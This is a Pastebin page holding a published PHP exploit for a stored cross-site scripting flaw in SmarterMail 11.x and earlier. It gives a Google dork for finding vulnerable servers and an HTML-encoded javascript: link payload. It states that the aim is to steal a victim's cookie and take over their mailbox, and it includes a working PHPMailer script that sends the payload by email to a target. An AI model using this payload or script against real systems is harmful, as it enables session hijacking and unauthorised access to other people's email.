API tools faq
paste
Advertisement
AndrewHaxalot

SmarterMail 11.x Cross Site Scripting

AndrewHaxalot
Jan 20th, 2014
203
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*
  4. # Exploit Title: SmarterMail Enterprise and Standard <=11.x Stored XSS
  5. # Google Dork: intext:"SmarterTools Inc." inurl:login.aspx
  6. # Date: 15 Jan 2014
  7. # Exploit Author: Saeed reza Zamanian [s.zamanian [AT] imenantivirus.com]
  8. # Vendor Homepage: http://www.smartertools.com/
  9. # Software Link (Standard Version): http://www.smartertools.com/smartermail/mail-server-download.aspx
  10. # Version: <= 11.x
  11. # Tested on: Windows 2008 R2 HTTPServer[Microsoft-IIS/7.5] ASP_NET[4.0.30319]
  12. # CVE : vendor id=2560
  13.  
  14. Greetz: H.Zamanian, K.Kia, K.Khani
  15.  
  16. WebApp Desciption:
  17. SmarterMail delivers Exchange-level email server software and instant messaging for a fraction of the cost. With lower hardware requirements, superior stability and reduced maintenance costs, SmarterMail has significantly lower TCO and is the best-in-class of Microsoft Exchange alternative for businesses and hosting companies.
  18.  
  19. Vulnerability Description:
  20. XSS codes can be stored in E-Mail Body.
  21. So you can send an email to the Victim with below payload and steal the victim's cookie.
  22.  
  23. <a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n
  24.  
  25. NOTE: javascript html char encode = javaScRipt
  26.  
  27. then you will be able to get into the victim's mailbox via the url:
  28. http://[WebSite]/[Smarter]/Default.aspx
  29.  
  30. ## I used phpmailer class for beside of the exploit so you need to download it here and run the exploit in the phpmailer directory:
  31. http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list
  32.  
  33.  
  34. */
  35.  
  36. echo "<title>SmarterMail Enterprise and Standard <= 11.X XSS Exploit</title>";
  37. require_once('class.phpmailer.php');
  38.  
  39. $mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
  40. $mail->IsSMTP(); // telling the class to use SMTP
  41.  
  42.  
  43. /* SETTINGS */
  44. $smtp_user = "attacker[at]email.com"; // any valid smtp account
  45. $smtp_pass = "PASSWORD"; // Your PASSWORD
  46. $smtp_port = "25"; // SMTP PORT Default: 25
  47. $smtp_host = "mail.email.com"; // any valid smtp server
  48. $victim = "victim@mail.com";
  49. $subject = "Salam";
  50. $body = '<a href=javaScRipt:alert("XSS")>Click Me, Please...</a>\r\n';
  51.  
  52.  
  53. try {
  54. $mail->SMTPDebug = 2; // enables SMTP debug information (for testing)
  55. $mail->SMTPAuth = true; // enable SMTP authentication
  56. $mail->Host = $smtp_host;
  57. $mail->Port = $smtp_port;
  58. $mail->Username = $smtp_user; // SMTP account username
  59. $mail->Password = $smtp_pass; // SMTP account password
  60.  
  61. $mail->SetFrom($smtp_user, 'Attacker');
  62. $mail->AddReplyTo($smtp_user, 'Attacker');
  63.  
  64. $mail->AddAddress($victim, 'Victim');
  65. $mail->Subject = $subject;
  66.  
  67. $mail->MsgHTML($body);
  68. $mail->Send();
  69. echo "Message Sent OK</p>\n";
  70. } catch (phpmailerException $e) {
  71. echo $e->errorMessage();
  72. } catch (Exception $e) {
  73. echo $e->getMessage();
  74. }
  75. ?>
  76.  
  77. </body>
  78. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!